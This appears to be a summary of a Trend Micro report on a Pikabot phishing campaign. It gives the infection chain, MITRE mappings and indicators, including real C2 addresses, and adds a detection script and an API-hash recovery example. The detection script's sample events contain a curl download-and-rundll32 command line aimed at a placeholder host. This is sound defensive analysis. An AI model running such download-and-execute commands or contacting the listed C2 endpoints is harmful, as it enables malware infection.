Keypoints
- Initial access is achieved through phishing emails using thread‑hijacking with password‑protected ZIP attachments (containing obfuscated JS or IMG) or malicious PDFs that link to JS downloaders.
- Heavily obfuscated JavaScript attempts CMD execution, falls back to ping checks, and uses curl.exe to download the Pikabot DLL payload into randomized temp directories.
- Alternate delivery uses an IMG containing an LNK and a Pikabot DLL; the LNK triggers rundll32.exe to run exported functions (e.g., “Limit” or “Crash”) that start the payload.
- The 32‑bit Pikabot DLL decrypts and runs shellcode that checks for a debugger (NtQueryInformationProcess), decrypts a second DLL, and runs anti‑sandbox checks that load sandbox/security‑product DLL names and junk (incorrect) library names to detect sandboxes.
- Pikabot reconstructs its core from encrypted PNG resources, creates a suspended SearchProtocolHost process, injects the core via indirect syscalls, and resolves APIs via hashes and GetProcAddress/LoadLibraryA.
- The core gathers system and process/network information (whoami, ipconfig, netstat, process list), stores interim data in a named pipe, serializes the data as JSON, encrypts it, and posts it to multiple C2 IPs/URLs.
- Observed campaign context links Pikabot infections to dropping Cobalt Strike beacons and eventual Black Basta ransomware activity after initial access.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Initial access via password‑protected archives or attached IMG/PDF distributed in hijacked email threads (‘Pikabot … gains initial access to its victim’s machine through spam emails containing an archive or a PDF attachment’).
- [T1566.002] Spearphishing Link – Use of malicious PDF content linking to a downloader that retrieves a JS payload (‘When the user selects the download button, it will attempt to access a malicious URL, then proceed to download a malicious JS file’).
- [T1059.007] Command and Scripting Interpreter: JavaScript – Malicious JS performs conditional command execution, array obfuscation and nested functions to retrieve and run payloads (‘The attached archive contains a heavily obfuscated JavaScript (JS) …’).
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The JS attempts to execute commands via cmd.exe and executes ping/echo fallbacks (‘The script attempts command execution using cmd.exe. … it echoes a designated string to the console and tries to ping a specified target’).
- [T1105] Ingress Tool Transfer – Payload retrieval from external servers using curl.exe and multiple download URLs (‘the script employs Curl.exe to download the Pikabot payload from an external server, saving the file in the system’s temporary directory’).
- [T1218.011] System Binary Proxy Execution: Rundll32 – Execution of the downloaded DLL payload via rundll32.exe using exported function names (‘it uses rundll32.exe to execute the downloaded Pikabot payload … with “Crash” as the export parameter’ / ‘rundll32.exe will be used to run the Pikabot DLL payload using an export parameter, “Limit”’).
- [T1204.002] User Execution: Malicious File – Use of LNK files disguised as documents to trick users into launching the payload (‘an LNK file posing as a Word document … Once the victim is lured into executing the LNK file, rundll32.exe will be used to run the Pikabot DLL payload’).
- [T1027] Obfuscated Files or Information – Heavy JS and array‑based obfuscation to conceal control flow and URLs (‘We discovered an additional variant of the malicious downloader that employed obfuscation methods involving array usage and manipulation’).
- [T1497.001] Virtualization/Sandbox Evasion: System Checks – Anti‑analysis by loading incorrect/junk libraries and sandbox/security‑product DLL names to detect sandboxes; the preceding debugger check via NtQueryInformationProcess maps to [T1622] Debugger Evasion rather than T1497 (‘the shellcode … identifies if the process is being debugged by calling the Windows API NtQueryInformationProcess … The decrypted DLL file will execute another anti‑analysis routine by loading incorrect libraries and other junk to detect sandboxes’).
- [T1055] Process Injection – Injector creates a suspended process (SearchProtocolHost) and injects the core module using indirect system calls to hide injection (‘the Pikabot injector creates a suspended process (%System%SearchProtocolHost) and injects the core module into it. The injector uses indirect system calls to hide its injection’).
- [T1082] System Information Discovery – The core gathers system details for exfiltration formatted as JSON (‘obtaining details about the victim’s system and forwarding them to a C&C server … The stolen data uses a JSON format’).
- [T1057] Process Discovery – Enumerates running processes via CreateToolhelp32Snapshot, Process32First/Process32Next (‘A list of running processes on the system will also be gathered … by calling CreateToolHelp32Snapshot and listing processes through Process32First and Process32Next’).
Indicators of Compromise
- [IP addresses] C2 endpoints observed in POST attempts – 70[.]34[.]209[.]101:13720, 137[.]220[.]55[.]190:2223, and 5 more IP:port entries.
- [File names / payloads] Delivery & payload artifacts – examples include LNK (disguised as Word document), Pikabot DLL (exports ‘Limit’ / ‘Crash’), and password‑protected ZIP/IMG attachments.
- [DLL names] Sandbox/anti‑analysis DLLs used for detection – cmdvrt.32.dll, avghookx.dll, and multiple other fake/real DLL names listed in the sandbox check table.
- [Mutex] Single‑instance mutex used by core – {A77FC435-31B6-4687-902D-24153579C738}.
- [URL path] C2 request path observed in exfiltration calls – ‘cervicobrachial/oIP7xH86DZ6hb?vermixUnintermixed=beatersVerdigrisy&backoff=9zFPSr’ (appended to the C2 IPs above).
Phishing emails used thread‑hijacking and delivered either a password‑protected ZIP (containing an obfuscated JavaScript or an IMG) or a PDF that links to a JS downloader. The JS first tries to run commands through cmd.exe; if that fails, it falls back to echoing a designated string to the console and pinging a specified target. It then uses curl.exe to fetch the DLL payload into a randomly named temp directory and executes the DLL via rundll32.exe with an export parameter such as “Crash” or “Limit”. An alternate chain mounts an IMG containing an LNK (posing as a Word document) and the Pikabot DLL, and the LNK invokes rundll32.exe directly.
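The process chain above (script host → curl.exe into a temp directory → rundll32.exe with the “Limit” or “Crash” export) is what a SOC would hunt for in process‑creation telemetry. The following is an added detection example written for this page, not code from the Trend Micro report; the events are constructed in a Sysmon Event ID 1‑like layout, and every path, host address and DLL file name in them is a placeholder rather than a real indicator.

```python
"""Detection of the Pikabot delivery chain over process-creation events.

Added example (not code from the Trend Micro report). The events below are
constructed for illustration in a Sysmon Event ID 1-like layout; the paths,
addresses and DLL names in them are placeholders, not real indicators.
"""
import ntpath
import re

# Script hosts / shells the JS downloader runs under, and the export names the
# report says the Pikabot DLL is launched with.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
PIKABOT_EXPORTS = {"limit", "crash"}

# Windows command lines: quoted tokens may contain spaces.
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmdline):
    """Split a Windows command line into tokens, dropping surrounding quotes."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def basename(path):
    return ntpath.basename(path.strip('"')).lower()


def in_temp(path):
    """True if a path points into a user or system temp directory."""
    p = path.strip('"').lower()
    return "\\temp\\" in p or p.startswith("%temp%")


def rundll32_target(argv):
    """Return (dll, export) from 'rundll32.exe dll,Export' or 'rundll32.exe dll Export'."""
    dll = argv[1] if len(argv) > 1 else ""
    export = argv[2].lstrip(",") if len(argv) > 2 else ""
    if "," in dll and not export:
        dll, export = dll.split(",", 1)
    return dll, export


def analyze_event(ev):
    """Return a list of (severity, technique, detail) findings for one event."""
    image = basename(ev["Image"])
    parent = basename(ev["ParentImage"])
    argv = split_cmdline(ev["CommandLine"])
    findings = []

    # Stage 1: the JS downloader pulls the DLL with curl.exe into a temp directory.
    if image == "curl.exe" and parent in SCRIPT_HOSTS:
        out = ""
        for i, tok in enumerate(argv):
            if tok in ("-o", "--output") and i + 1 < len(argv):
                out = argv[i + 1]
        if in_temp(out):
            findings.append(("high", "T1105", f"curl.exe under {parent} writing {out}"))
        else:
            findings.append(("medium", "T1105", f"curl.exe spawned by script host {parent}"))

    # Fallback path: the downloader echoes a string and pings a target.
    if image == "ping.exe" and parent in SCRIPT_HOSTS:
        findings.append(("low", "T1059.007", f"ping.exe spawned by {parent}"))

    # Stage 2: rundll32.exe runs the DLL through the 'Limit' or 'Crash' export.
    if image == "rundll32.exe":
        dll, export = rundll32_target(argv)
        if export.lower() in PIKABOT_EXPORTS:
            findings.append(("high", "T1218.011", f"rundll32.exe {dll} export {export}"))
        elif dll and (in_temp(dll) or parent in SCRIPT_HOSTS):
            findings.append(("medium", "T1218.011", f"rundll32.exe loading {dll} from {parent}"))
    return findings


def scan(events):
    """Run analyze_event over events; returns [(index, severity, technique, detail)]."""
    hits = []
    for idx, ev in enumerate(events):
        for sev, tid, detail in analyze_event(ev):
            hits.append((idx, sev, tid, detail))
    return hits


# Constructed sample events (placeholders, not real indicators).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'curl.exe -o "C:\Users\u\AppData\Local\Temp\k3Fz9a\stage.dll" http://203.0.113.10/get'},
    {"Image": r"C:\Windows\System32\PING.EXE", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "ping -n 1 203.0.113.10"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'rundll32.exe "C:\Users\u\AppData\Local\Temp\k3Fz9a\stage.dll",Crash'},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe E:\doc\support.dll Limit"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The export‑name match is the high‑confidence signal; the temp‑directory and script‑host parent rules are kept at lower severity because curl.exe and rundll32.exe are legitimately used by many installers, as the benign shell32.dll event shows.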
The Pikabot DLL (32‑bit) exposes many exports and uses an export (e.g., “Limit”) to decrypt and run shellcode. The shellcode performs anti‑debug checks by calling NtQueryInformationProcess, decrypts a second DLL which runs anti‑sandbox routines (loading incorrect/junk libraries and fake security DLL names), and then loads encrypted PNG resources that contain the core module. After rebuilding the core, Pikabot spawns a suspended SearchProtocolHost process and injects the core using indirect system calls to evade detection.
At runtime the core resolves APIs via hashed lookups backed by GetProcAddress/LoadLibraryA, enforces a single instance with a hardcoded mutex, checks the system language to avoid Russian/Ukrainian targets, collects system and network data (whoami, ipconfig, netstat, and a process list via CreateToolhelp32Snapshot), stores intermediate data in a named pipe, serializes the collected data as JSON, encrypts it, and posts it to multiple C2 IPs/URLs. These actions enable follow‑on deployment of remote access tools (Cobalt Strike) and potential Black Basta ransomware activity.
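Resolving APIs by hash hides the import names an analyst would otherwise read off the binary; recovering them means precomputing the hash of every candidate export and matching the sample's table against it. The block below is an added analyst‑side example written for this page, not Pikabot's own code: the report does not state which hash Pikabot uses, so the ROR13 routine is an assumption chosen because it is common in shellcode, and the export lists are a constructed subset rather than a dump of real DLLs.

```python
"""Recovering hashed API names, as used by loaders that resolve imports by hash.

Added example, not Pikabot's code. The ROR13 hash is an ASSUMPTION (the report
gives no hash algorithm); the export lists are a constructed subset, and a real
workflow would dump them from the DLLs with a PE parser.
"""


def ror32(value, n):
    """Rotate a 32-bit value right by n bits."""
    value &= 0xFFFFFFFF
    return ((value >> n) | (value << (32 - n))) & 0xFFFFFFFF


def ror13_hash(name):
    """ROR13 additive hash over an ASCII export name (assumed algorithm)."""
    h = 0
    for ch in name.encode("ascii"):
        h = ror32(h, 13)
        h = (h + ch) & 0xFFFFFFFF
    return h


def build_hash_table(exports_by_module, hash_fn=ror13_hash):
    """Precompute hash -> (module, export) for every name and report collisions.

    Collisions matter: a 32-bit hash over tens of thousands of exports can
    collide, and the first module wins, so the analyst must check the list.
    """
    table = {}
    collisions = []
    for module, names in exports_by_module.items():
        for name in names:
            h = hash_fn(name)
            if h in table and table[h] != (module, name):
                collisions.append((h, table[h], (module, name)))
            table.setdefault(h, (module, name))
    return table, collisions


def resolve_hashes(hashes, table):
    """Map each hash from a sample's table to (module, name), or None if unknown."""
    return [(h, table.get(h)) for h in hashes]


# Constructed subset of exports (real API names, not a full export dump).
EXPORTS = {
    "kernel32.dll": [
        "LoadLibraryA", "GetProcAddress", "CreateProcessW",
        "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
        "CreateMutexW", "CreateNamedPipeW",
    ],
    "ntdll.dll": [
        "NtQueryInformationProcess", "NtAllocateVirtualMemory",
        "NtWriteVirtualMemory",
    ],
}


def sample_import_hashes():
    """Constructed stand-in for a hash table pulled out of a sample; the last
    value is deliberately unknown to show the unresolved case."""
    return [
        ror13_hash("LoadLibraryA"),
        ror13_hash("NtQueryInformationProcess"),
        ror13_hash("CreateToolhelp32Snapshot"),
        0xDEADBEEF,
    ]


if __name__ == "__main__":
    table, collisions = build_hash_table(EXPORTS)
    for h, resolved in resolve_hashes(sample_import_hashes(), table):
        print(f"{h:08x} -> {resolved}")
    print("collisions:", collisions)
```

When the assumed hash produces no matches against a full export dump, the algorithm is wrong (different rotation count, XOR instead of add, Unicode input, or a per‑sample seed) and must be lifted from the sample's resolver routine before the table is rebuilt.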
Read more: https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html